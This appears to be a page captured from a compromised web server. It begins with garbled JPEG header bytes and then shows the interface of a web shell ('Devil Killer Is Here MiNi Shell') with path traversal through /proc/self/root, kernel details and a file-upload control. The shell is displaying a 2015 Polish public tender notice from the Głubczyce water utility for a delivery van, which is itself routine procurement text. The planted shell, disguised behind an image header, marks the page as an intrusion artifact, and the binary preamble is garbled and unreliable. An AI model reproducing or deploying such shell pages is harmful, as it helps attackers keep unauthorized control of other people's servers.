JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20151015/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20151015/273922-N-2015.html

<p class="kh_header"><b>Głubczyce: Zakup wraz z dostawą fabrycznie nowego samochodu
dostawczego z homologacją ciężarową</b><br>
<b>Numer ogłoszenia: 273922 - 2015; data zamieszczenia: 15.10.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Głubczyckie Wodociągi i Kanalizacja sp. z o.o. , ul. Powstańców 2, 48-100 Głubczyce, woj. opolskie, tel. 077 4852721, faks 077 4852721 wew. 12.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wodociagi-glubczyce.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka prawa handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup wraz z dostawą fabrycznie nowego samochodu
dostawczego z homologacją ciężarową.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia
Przedmiotem zamówienia jest:
1.	samochód z homologacją ciężarową, 
2.	3 - osobowy, 
3.	pojemność skokowa nie mniej niż 2150 cm3, 
4.	skrzynia biegów mechaniczna/ręczna nie mniej niż 5 biegowa, 
5.	wspomaganie kierownicy, 
6.	napęd przedni, 
7.	moc maksymalna nie mniej niż 100 KM,
8.	objętość przestrzeni ładunkowej nie mniej niż 7 m3,
9.	wysokość zewnętrzna nie więcej niż 2550 mm,
10.	długość całkowita nie więcej niż 5050 mm, 
11.	ładowność nie mniej niż 850 kg,
12.	norma spalania euro 5, 
13.	paliwo: olej napędowy, 
14.	zbiornik paliwa: min 60 litrów,
15.	poduszka powietrzna kierowcy,
16.	gniazdo 12V,
17.	uchwyty do mocowania ładunku,
18.	podłoga ze sklejki wodoodpornej pokrytej wykładziną antypoślizgową na całej długości części ładunkowej, 
19.	klimatyzacja manualna, 
20.	zapalniczka, 
21.	centralny zamek, 
22.	immobiliser, 
23.	system ESP i ABS,  
24.	szyby przednie boczne sterowane elektrycznie, 
25.	fotel kierowcy regulowany,
26.	radioodtwarzacz,
27.	hak holowniczy,
28.	lampa sufitowa w przedziale ładunkowym, 
29.	czujnik cofania. 

Przedmiot zamówienia obejmuje swym zakresem również dostawę i montaż sygnału świetlnego, bez utraty gwarancji. Sygnał świetlny z napisem Pogotowie wodociągowe winien być zamontowany na przodzie samochodu nad przednią szybą i nie powinien wystawać poza obrys górny pojazdu. 

Zadanie obejmuje: 
-     odbiór techniczno - jakościowy samochodu,
-     odbiór faktyczny samochodu,
-     miejsce dostawy: Głubczyce.

Maszyna winna być wykonana zgodnie z obowiązującymi Polskimi Normami oraz zasadami współczesnej wiedzy technicznej zapewniając bezpieczne i higieniczne warunki pracy, stosując takie wyroby i materiały, które posiadają stosowne aprobaty techniczne i atesty przewidziane Polskim prawem, winna spełniać również wymogi pojazdu dopuszczonego do ruchu zgodnie z ustawą prawo o ruchu drogowym.

Zamawiający wymaga aby autoryzowany punkt obsługi serwisowej dla dostarczonego samochodu znajdował się w odległości nie większej niż 200 km licząc od siedziby Zamawiającego. 
Od uczestników oczekuje się starannego zapoznania się z dostarczoną specyfikacją istotnych warunków zamówienia, specyfikacją techniczną oraz zdobycia wszelkich informacji, które mogą być konieczne do przygotowania oferty i podpisania umowy.
				    
2. Termin realizacji zamówienia

Zamawiający wymaga aby przedmiot zamówienia został zrealizowany w terminie 45 dni od dnia podpisania umowy.  

3. Gwarancja

Wykonawca udzieli Zamawiającemu następujących gwarancji jakości: 
1)	Gwarancja mechaniczna min. 2 lata z limitem min. 80 000 km - obejmująca swoim zakresem bezpłatne naprawy samochodu w przypadku jego usterek mechanicznych, elektrycznych, elektronicznych oraz hydraulicznych lub innych wad fizycznych. 
2)	Gwarancja na lakier min. 2 lata.
3)	Gwarancja antyperforacyjna min. 5 lat..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 34.10.00.00-8, 34.13.61.00-0, 34.00.00.00-7, 34.11.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 45.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wysokość wadium Wykonawca przystępujący do postępowania jest
zobowiązany wnieść wadium w wysokości: 2 000,00 zł. 2. Forma wadium Wadium może być wniesione w: 1)
pieniądzu 2) poręczeniach bankowych, 3) gwarancjach bankowych, 4) gwarancjach ubezpieczeniowych, 5)
poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r.
o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275, z 2008 r. Nr 116, poz.
730 i 732 i Nr 227, poz. 1505 oraz z 2010 r. Nr 96, poz. 620). 3. Termin i miejsce wniesienia wadium Wykonawca
wnosi wadium w terminie do dnia: 18.09.2015 r. do godz. 12.00. W przypadku wnoszenia wadium w pieniądzu
ustaloną kwotę należy wpłacić na konto Zamawiającego w Banku Spółdzielczym Głubczyce Nr: 65 8868 0004
1000 0000 0084 0001. Oferta jest zabezpieczona wadium jeżeli wpłacona kwota w chwili otwarcia ofert znajduje
się na powyższym koncie. Kserokopię dowodu wpłaty należy dołączyć do oferty. W przypadku wnoszenia wadium w pozostałych dopuszczalnych formach określonych w pkt 2 SIWZ oryginały odpowiednich dokumentów winny być
złożone w kasie w siedzibie zamawiającego przed upływem terminu składania ofert. Kserokopię dokumentu
wniesienia wadium należy dołączyć do oferty. Nie wniesienie wadium w wymaganym terminie oraz wymaganej
wysokości i formie skutkuje wykluczeniem wykonawcy z postępowania. Wykonawca, którego oferta została
wybrana traci wadium wraz z odsetkami na rzecz zamawiającego w przypadku, gdy: 1) odmówił podpisania
umowy na warunkach określonych w ofercie oraz w SIWZ w terminie i miejscu wskazanym przez Zamawiającego
2) zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie dostawcy. 4. Zwrot wadium Zamawiający
niezwłocznie zwróci wadium, gdy: 1) upłynął termin związania ofertą, 2) zawarto umowę, 3) unieważnił
postępowanie, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia. Zamawiający
zwróci wadium w ciągu trzech dni od daty pisemnego zgłoszenia wniosku o zwrot wadium przez Wykonawcę: 1)
który wycofał ofertę przed upływem terminu składania ofert, 2) który został wykluczony z postępowania, 3)
którego oferta została odrzucona. Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami
wynikającymi z umowy rachunku bankowego, na którym wadium było przechowywane, pomniejszone o koszty
prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez
wykonawcę. 5. Utrata wadium Wykonawca, którego oferta została wybrana traci wadium wraz z odsetkami na
rzecz Zamawiającego w sytuacjach wskazanych w art. 46 ust.5 ustawy Prawo zamówień publicznych</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki, dotyczące posiadania
uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają
obowiązek ich posiadania. Ocena spełnienia warunku udziału w postępowaniu będzie dokonana na
zasadzie spełnia/nie spełnia. Na potwierdzenie spełnienia w/w warunku Wykonawca przedłoży
oświadczenie potwierdzające spełnienie warunków określonych w art. 22 ust. 1 ustawy z dnia 29
stycznia 2004r. Prawo zamówień publicznych (Dz. U. z 2013 r. poz. 907 ze zm.), stanowiące załącznik nr
2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki, dotyczące posiadania
wiedzy i doświadczenia. Ocena spełnienia warunku udziału w postępowaniu będzie dokonana na
zasadzie spełnia/nie spełnia. Weryfikacja spełnienia tego warunku dokonywana będzie w oparciu o
dotychczasowe zrealizowane zamówienia. Wykonawca w celu potwierdzenia, że spełnia warunek
dotyczący posiadania wiedzy i doświadczenia, zobowiązany jest wykazać, że w okresie ostatnich trzech
lat a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej 2 dostawy
odpowiadające swoim rodzajem przedmiotowi zamówienia na łączną kwotę nie mniejszą niż 120 000,00 zł. brutto w tym co najmniej jedną na kwotę nie mniejszą niż 60 000,00 zł. brutto. W przypadku
wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniane
będzie łączne doświadczenie. Na potwierdzenie spełnienia w/w warunku Wykonawca przedłoży
oświadczenie potwierdzające spełnienie warunków określonych w art. 22 ust. 1 ustawy z dnia 29
stycznia 2004r. Prawo zamówień publicznych (Dz. U. z 2013 r. poz. 907, 984 i 1047 z późn. zm.),
stanowiące załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki, dotyczące sytuacji
ekonomicznej i finansowej. Wykonawcy znajdują się w sytuacji ekonomicznej i finansowej zapewniającej
wykonanie zamówienia. Każdy Wykonawca musi posiadać opłaconą polisę OC w zakresie prowadzonej
działalności na minimum 100 000,00 zł przez cały okres obowiązywania umowy. Polisa lub inny
dokument potwierdzający aktualne ubezpieczenie odpowiedzialności cywilnej w zakresie prowadzonej
działalności, muszą być aktualne w dacie składania ofert. W przypadku wygaśnięcia ubezpieczenia
przed końcem zawartej umowy, każdy Wykonawca zobowiązany jest złożyć oświadczenie o
kontynuowaniu ubezpieczania. Ocena spełnienia warunków udziału w postępowaniu będzie dokonana na
zasadzie spełnia/nie spełnia. Na potwierdzenie spełnienia w/w warunku Wykonawca przedłoży
oświadczenie potwierdzające spełnienie warunków określonych w art. 22 ust. 1 ustawy z dnia 29
stycznia 2004r. Prawo zamówień publicznych (Dz. U. z 2013 r. poz. 907 ze zm.), stanowiące załącznik nr
2 do SIWZ oraz opłaconą polisę OC. Jeżeli z uzasadnionej przyczyny Wykonawca nie może przedstawić
dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez Zamawiającego, może
przedstawić inny dokument, który w wystarczający sposób potwierdza spełnienie opisanego przez
Zamawiającego warunku. Wykonawca, zgodnie z art. 26 ust. 2b ustawy z dnia 29 stycznia 2004 r.
Prawo zamówień (Dz. U. z 2013 r. poz. 907 ze zm.), może polegać na wiedzy i doświadczeniu,
potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych
innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony druk oferta, stanowiący załącznik nr 1 do niniejszej specyfikacji. 2. Parafowany projekt umowy jako
akceptacja jej treści i warunków (na formularzu stanowiącym załącznik nr 7 do SIWZ). 3. Zdjęcia oraz
dokumentacja techniczna pojazdu (np. karta charakterystyki, ogólne cechy konstrukcyjne). 4. Potwierdzenie
wniesienia wadium. 5. Oświadczenie o zapewnieniu serwisu gwarancyjnego i pogwarancyjnego. 6. Wykonawca
powinien dostarczyć aktualne pełnomocnictwo udzielone osobie podpisującej dokumenty ofertowe, o ile jej prawo
do reprezentowania Wykonawcy w powyższym zakresie nie wynika wprost z dokumentu rejestrowego. 7.
Wykonawca przekłada oświadczenie, że wobec prowadzonej przez niego firmy nie otwarto likwidacji ani też nie
ogłoszono w stosunku do niej upadłości lub ogłoszono upadłość, jednakże po ogłoszeniu upadłości został zawarty
układ zatwierdzony prawomocnym wyrokiem sądu, który nie przewiduje zaspokojenia wierzycieli przez likwidację
firmy, stanowiące załącznik nr 5 do niniejszej SIWZ. 8. w przypadku, gdy Wykonawca będzie polegał na wiedzy i
doświadczeniu, potencjale technicznym, osób zdolnych do wykonania zamówienia lub zdolnościach finansowych
innych podmiotów, zgodnie z pkt. 2 SIWZ, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował
zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne
zobowiązanie (tj. w formie oryginału lub kopii poświadczonej notarialnie) tych podmiotów do oddania mu do
dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia, tj. np.: - pisemne
zobowiązanie tych podmiotów do zrealizowania części zamówienia, wskazujące zakres/rodzaj czynności, które te
podmioty zobowiązują się wykonać w przypadku, gdy Wykonawca wykazując spełnienie warunku udziału w
postępowaniu polega na wiedzy i doświadczeniu innych podmiotów. W przypadku Wykonawców wspólnie
ubiegających się o udzielenie zamówienia (konsorcjum) do wniosku należy dołączyć pełnomocnictwo dla przedstawiciela/lidera konsorcjum. 9. W przypadku konsorcjum każdy uczestnik musi wykazać spełnienie warunku
o nie podleganiu wykluczeniu z postępowania o udzielenie zamówienia i złożyć dokumenty wymienione w pkt.
III.4.2 i Cześci III pkt. 2 SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Gwarancja - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Na podstawie art. 144 ustawy PZP Zamawiający przewiduje wprowadzenie istotnych zmian postanowień
zawartej umowy w stosunku do treści oferty na podstawie, której dokonał wyboru Wykonawcy, w przypadku: a.
działania siły wyższej, mającej bezpośredni wpływ na termin wykonania przedmiotu umowy (np. klęski żywiołowe,
strajki). b. gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na
realizację przedmiotu umowy (np. ustawowa zmiana stawki VAT). c. w sytuacji, gdy powstała możliwość
dokonania nowszych i korzystniejszych dla Zamawiającego rozwiązań technologicznych i technicznych, niż te
istniejące w dacie podpisania umowy, nie prowadzące do zmiany przedmiotu zamówienia 2. Każda zmiana
postanowień niniejszej umowy wymaga formy pisemnej w postaci aneksu pod rygorem nieważności. 3. Wskazane
powyżej zmiany mogą zostać wprowadzone, jedynie w przypadku jeżeli obydwie strony umowy zgodnie uznają, że
zaszły wskazane okoliczności oraz wprowadzenie zmian jest konieczne dla prawidłowej realizacji zamówienia. 4.
Zmiana umowy może zostać zainicjowana przez każdą ze Stron umowy. 5. Zmiana umowy wymaga spisania
protokołu konieczności</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wodociagi-glubczyce.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Powstańców 2 48-100
Głubczyce.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.10.2015 godzina 12:00, miejsce: Głubczyckie Wodociągi i Kanalizacja sp. z o.o. ul. Powstańców 2 48-100 Głubczyce.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





